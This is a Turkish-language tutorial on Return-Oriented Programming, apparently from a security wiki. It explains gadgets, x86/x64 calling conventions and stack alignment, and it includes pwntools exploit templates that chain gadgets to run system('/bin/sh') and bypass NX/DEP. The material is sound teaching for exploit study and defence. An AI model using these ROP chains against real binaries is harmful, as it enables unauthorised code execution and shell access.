ROP - Return Oriented Programing

Temel Bilgiler

Return-Oriented Programming (ROP), No-Execute (NX) veya Data Execution Prevention (DEP) gibi güvenlik önlemlerini aşmak için kullanılan ileri düzey bir istismar tekniğidir. Bir saldırgan, shellcode enjekte etmek ve çalıştırmak yerine, ikili dosyada veya yüklenmiş kütüphanelerde zaten mevcut olan kod parçalarını, yani "gadgets"'ı kullanır. Her gadget genellikle bir ret talimatı ile biter ve verileri registerlar arasında taşımak veya aritmetik işlemler yapmak gibi küçük bir işlem gerçekleştirir. Bu gadget'ları bir araya getirerek, bir saldırgan keyfi işlemler gerçekleştirmek için bir yük oluşturabilir ve böylece NX/DEP korumalarını etkili bir şekilde aşabilir.

ROP Nasıl Çalışır

1. Kontrol Akışını Ele Geçirme: İlk olarak, bir saldırgan bir programın kontrol akışını ele geçirmelidir, genellikle bir buffer overflow kullanarak stack'teki kaydedilmiş dönüş adresini yazmak suretiyle.

2. Gadget Zincirleme: Saldırgan daha sonra istenen eylemleri gerçekleştirmek için gadget'ları dikkatlice seçer ve zincirler. Bu, bir fonksiyon çağrısı için argümanları ayarlamayı, fonksiyonu çağırmayı (örneğin, system("/bin/sh")) ve gerekli temizlik veya ek işlemleri yönetmeyi içerebilir.

3. Yükün Çalıştırılması: Zayıf fonksiyon döndüğünde, meşru bir konuma dönmek yerine gadget zincirini çalıştırmaya başlar.

Araçlar

Genellikle, gadget'lar ROPgadget, ropper veya doğrudan pwntools (ROP) kullanılarak bulunabilir.

x86 Örneğinde ROP Zinciri

x86 (32-bit) Çağrı Konvansiyonları

• cdecl: Çağrıcı stack'i temizler. Fonksiyon argümanları stack'e ters sırayla (sağdan sola) itilir. Argümanlar stack'e sağdan sola itilir.

• stdcall: cdecl'e benzer, ancak çağrılan fonksiyon stack'i temizlemekten sorumludur.

Gadget Bulma

Öncelikle, ikili dosya veya yüklenmiş kütüphaneler içinde gerekli gadget'ları tanımladığımızı varsayalım. İlgilendiğimiz gadget'lar şunlardır:

• pop eax; ret: Bu gadget, stack'in en üstündeki değeri EAX register'ına alır ve ardından döner, böylece EAX'ı kontrol etmemizi sağlar.

• pop ebx; ret: Yukarıdaki gibi, ancak EBX register'ı için, EBX üzerinde kontrol sağlar.

• mov [ebx], eax; ret: EAX'taki değeri EBX tarafından işaret edilen bellek konumuna taşır ve ardından döner. Bu genellikle write-what-where gadget olarak adlandırılır.

• Ayrıca, system() fonksiyonunun adresine de sahibiz.

ROP Zinciri

pwntools kullanarak, system('/bin/sh')'yi çalıştırmayı hedefleyerek ROP zinciri yürütmesi için stack'i aşağıdaki gibi hazırlarız, zincirin nasıl başladığına dikkat edin:

1. Hizalama amaçlı bir ret talimatı (isteğe bağlı)

2. system fonksiyonunun adresi (ASLR'nin devre dışı bırakıldığını ve libc'nin bilindiğini varsayarak, daha fazla bilgi için Ret2lib)

3. system()'den dönüş adresi için yer tutucu

4. "/bin/sh" dizesinin adresi (system fonksiyonu için parametre)

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadc0de

# A gadget to control the return address, typically found through analysis
ret_gadget = 0xcafebabe  # This could be any gadget that allows us to control the return address

# Construct the ROP chain
rop_chain = [
ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
system_addr,   # Address of system(). Execution will continue here after the ret gadget
0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
]

# Flatten the rop_chain for use
rop_chain = b''.join(p32(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

ROP Zinciri x64 Örneği

x64 (64-bit) Çağrı Konvansiyonları

• Unix benzeri sistemlerde System V AMD64 ABI çağrı konvansiyonunu kullanır; burada ilk altı tam sayı veya işaretçi argümanı RDI, RSI, RDX, RCX, R8 ve R9 kayıtlarında iletilir. Ek argümanlar yığında iletilir. Dönüş değeri RAX'a yerleştirilir.

• Windows x64 çağrı konvansiyonu, ilk dört tam sayı veya işaretçi argümanı için RCX, RDX, R8 ve R9 kullanır; ek argümanlar yığında iletilir. Dönüş değeri RAX'a yerleştirilir.

• Kayıtlar: 64-bit kayıtlar RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP ve R8'den R15'e kadar içerir.

Gadget Bulma

Amacımız için, RDI kaydını ayarlamamıza ( system() fonksiyonuna "/bin/sh" dizesini argüman olarak iletmek için) ve ardından system() fonksiyonunu çağırmamıza olanak tanıyacak gadget'lara odaklanalım. Aşağıdaki gadget'ları belirlediğimizi varsayıyoruz:

• pop rdi; ret: Yığının en üstündeki değeri RDI'ye alır ve ardından döner. system() için argümanımızı ayarlamak için gereklidir.

• ret: Basit bir dönüş, bazı senaryolar için yığın hizalaması için faydalıdır.

Ve system() fonksiyonunun adresini bildiğimizi biliyoruz.

ROP Zinciri

Aşağıda, pwntools kullanarak x64 üzerinde system('/bin/sh') çalıştırmayı hedefleyen bir ROP zinciri kurma ve yürütme örneği bulunmaktadır:

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadbeefdeadbeef

# Gadgets (hypothetical values)
pop_rdi_gadget = 0xcafebabecafebabe  # pop rdi; ret
ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary

# Construct the ROP chain
rop_chain = [
ret_gadget,        # Alignment gadget, if needed
pop_rdi_gadget,    # pop rdi; ret
bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
system_addr        # Address of system(). Execution will continue here.
]

# Flatten the rop_chain for use
rop_chain = b''.join(p64(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

In this example:

• RDI'yi "/bin/sh" adresine ayarlamak için pop rdi; ret gadget'ını kullanıyoruz.

• RDI'yi ayarladıktan sonra, zincirde system() adresi ile doğrudan system()'e atlıyoruz.

• Hedef ortamın gerektirmesi durumunda hizalama için ret_gadget kullanılır; bu, işlevleri çağırmadan önce doğru yığın hizalamasını sağlamak için x64'te daha yaygındır.

Yığın Hizalaması

x86-64 ABI bir call instruction yürütüldüğünde yığının 16-byte hizalı olmasını garanti eder. LIBC, performansı optimize etmek için SSE instructions (örneğin movaps) kullanır ve bu hizalamayı gerektirir. Yığın düzgün hizalanmadığında (yani RSP 16'nın katı değilse), ROP chain içinde system gibi işlevlere yapılan çağrılar başarısız olur. Bunu düzeltmek için, ROP chain'inizde system'i çağırmadan önce basitçe bir ret gadget ekleyin.

x86 vs x64 ana fark

ARM64 Örneğinde ROP zinciri

ARM64 Temelleri & Çağrı konvansiyonları

Bu bilgi için aşağıdaki sayfayı kontrol edin:

ROP'a Karşı Koruma

• ASLR & PIE: Bu korumalar, gadget'ların adreslerinin yürütme sırasında değişmesi nedeniyle ROP kullanımını zorlaştırır.

• Stack Canaries: Bir BOF durumunda, ROP zincirini kötüye kullanmak için dönüş işaretçilerini yazmak için yığın kanaryasını atlatmak gerekir.

• Gadget Eksikliği: Yeterli gadget yoksa bir ROP zinciri oluşturmak mümkün olmayacaktır.

ROP tabanlı teknikler

ROP'un, keyfi kodu yürütmek için sadece bir teknik olduğunu unutmayın. ROP'a dayalı olarak birçok Ret2XXX tekniği geliştirilmiştir:

• Ret2lib: Keyfi parametrelerle yüklü bir kütüphaneden keyfi işlevleri çağırmak için ROP kullanın (genellikle system('/bin/sh') gibi bir şey).

• Ret2Syscall: ROP kullanarak bir syscall'a, örneğin execve, çağrı hazırlamak ve keyfi komutlar yürütmek için kullanın.

• EBP2Ret & EBP Zincirleme: İlki akışı kontrol etmek için EIP yerine EBP'yi kötüye kullanacak ve ikincisi Ret2lib'e benzer ancak bu durumda akış esas olarak EBP adresleri ile kontrol edilir (ancak EIP'yi kontrol etmek de gereklidir).

Diğer Örnekler & Referanslar

• https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions

• https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html

• 64 bit, Pie ve nx etkin, kanaryasız, yalnızca bir vsyscall adresi ile RIP'i yazmak amacıyla yığındaki bir sonraki adrese geri dönmek için adresin bir kısmını sızdıran işlevin parçasını almak için kısmi bir yazma

• https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/

• arm64, ASLR yok, yığını çalıştırılabilir hale getirmek ve yığında shellcode'a atlamak için ROP gadget